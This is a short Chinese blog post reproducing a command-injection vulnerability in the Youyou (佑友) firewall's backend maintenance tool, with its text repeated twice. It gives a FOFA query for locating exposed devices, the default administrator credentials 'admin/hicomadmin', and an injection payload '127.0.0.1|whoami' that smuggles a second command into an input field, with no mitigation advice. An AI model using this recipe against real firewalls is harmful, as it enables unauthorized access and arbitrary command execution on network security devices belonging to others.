漏洞描述
i ⭐
佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令
漏洞影响
s ✅
佑友防火墙
空间测绘
d ⭕
FOFA:title="佑友防火墙"
漏洞复现
- 登陆页面
- ✅默认账号密码为
admin/hicomadmin
1 | 127.0.0.1|whoami |
个人博客
孤桜懶契:https://gylq.gitee.io/time
i ⭐
佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令
s ✅
佑友防火墙
d ⭕
FOFA:title="佑友防火墙"
admin/hicomadmin
1 | 127.0.0.1|whoami |
孤桜懶契:https://gylq.gitee.io/time
本文标题:佑友防火墙 后台命令执行漏洞
文章作者:孤桜懶契
发布时间:2022年04月07日 - 12:25:30
最后更新:2022年05月24日 - 21:00:57
原始链接:http://gylq.gitee.io/time/posts/16.html
许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。
微信支付
支付宝